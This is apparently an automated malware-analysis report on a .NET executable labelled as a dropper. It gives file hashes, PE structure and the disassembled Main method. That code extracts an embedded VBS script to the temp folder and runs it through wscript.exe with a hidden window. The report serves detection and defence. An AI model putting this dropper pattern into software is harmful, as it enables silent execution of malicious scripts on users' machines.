Malicious

53c64a9d1b6a2f6f871830424454ba0c

PE Executable | MD5: 53c64a9d1b6a2f6f871830424454ba0c | Size: 32.77 KB | application/x-dosexec


Characteristics

Symbol Obfuscation Score: Very low

Hash
Hash Value
MD5
53c64a9d1b6a2f6f871830424454ba0c
Sha1
178d4ae72585ed7b9756a6f86f1b2911a5d441ac
Sha256
a539471a5811cdbd9f80e7d09804ae8b2f9986798a7c0f3b0d00addba087cac1
Sha384
2250b1b8eb17b2245d3d50ce3dd1edf7d32d66e0c5da70bacf3ac928fd5d4bfe38dceda990d08b9865db46f1e68bb646
Sha512
103d779f069bba6a9909f23ca8450bfefd921871371de11a1e56f1d3ed0f98681f1fa3010584bc8b07f59b98ba3c3c0a40b7b90dd304e657c8f064bcd6ccbbe3
SSDeep
768:AA5Igz9dwe/Y5Plx58cqPqjM6RF2UHG58KR9W:NuOdwe/Y5D2cqPF4A5BR9W
TLSH
4EE2E52AD554AFF0CB2F61B2AC97284641904325A674390E75CE9ADC2F34364CF991EF

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
Malicious
69763daebbd3e.vbs.deobfuscated.vbs
Malicious
Information
Info: PE Detect: PeReader OK (file layout)
Module Name: 69763daebbd3e.exe
Full Name: 69763daebbd3e.exe
EntryPoint: System.Void Dropper.Program::Main(System.String[])
Scope Name: 69763daebbd3e.exe
Scope Type: ModuleDef
Kind: Windows
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: 69763daebbd3e
Assembly Version: 0.0.0.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: <null>
Total Strings: 4
Main Method: System.Void Dropper.Program::Main(System.String[])
Main IL Instruction Count: 96

Main IL

nop <null>
nop <null>
ldstr 69763daebbd3e.vbs
stloc.0 <null>
call System.String System.IO.Path::GetTempPath()
stloc.1 <null>
ldloc.1 <null>
ldloc.0 <null>
call System.String System.IO.Path::Combine(System.String,System.String)
stloc.2 <null>
call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly()
ldloc.0 <null>
callvirt System.IO.Stream System.Reflection.Assembly::GetManifestResourceStream(System.String)
stloc.3 <null>
nop <null>
ldloc.3 <null>
ldnull <null>
ceq <null>
ldc.i4.0 <null>
ceq <null>
stloc.s V_6
ldloc.s V_6
brtrue.s IL_0035: ldloc.2
leave IL_00D9: nop
ldloc.2 <null>
ldc.i4.2 <null>
newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode)
stloc.s V_4
nop <null>
ldloc.3 <null>
ldloc.s V_4
callvirt System.Void System.IO.Stream::CopyTo(System.IO.Stream)
nop <null>
nop <null>
leave.s IL_005F: nop
ldloc.s V_4
ldnull <null>
ceq <null>
stloc.s V_6
ldloc.s V_6
brtrue.s IL_005E: endfinally
ldloc.s V_4
callvirt System.Void System.IDisposable::Dispose()
nop <null>
endfinally <null>
nop <null>
nop <null>
leave.s IL_0075: nop
ldloc.3 <null>
ldnull <null>
ceq <null>
stloc.s V_6
ldloc.s V_6
brtrue.s IL_0074: endfinally
ldloc.3 <null>
callvirt System.Void System.IDisposable::Dispose()
nop <null>
endfinally <null>
nop <null>
newobj System.Void System.Diagnostics.Process::.ctor()
stloc.s V_5
ldloc.s V_5
callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo()
ldstr wscript.exe
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String)
nop <null>
ldloc.s V_5
callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo()
ldstr "
ldloc.2 <null>
ldstr "
call System.String System.String::Concat(System.String,System.String,System.String)
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String)
nop <null>
ldloc.s V_5
callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo()
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle)
nop <null>
ldloc.s V_5
callvirt System.Diagnostics.ProcessStartInfo System.Diagnostics.Process::get_StartInfo()
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean)
nop <null>
ldloc.s V_5
callvirt System.Boolean System.Diagnostics.Process::Start()
pop <null>
nop <null>
leave.s IL_00D8: nop
pop <null>
nop <null>
nop <null>
leave.s IL_00D8: nop
nop <null>
nop <null>
ret <null>
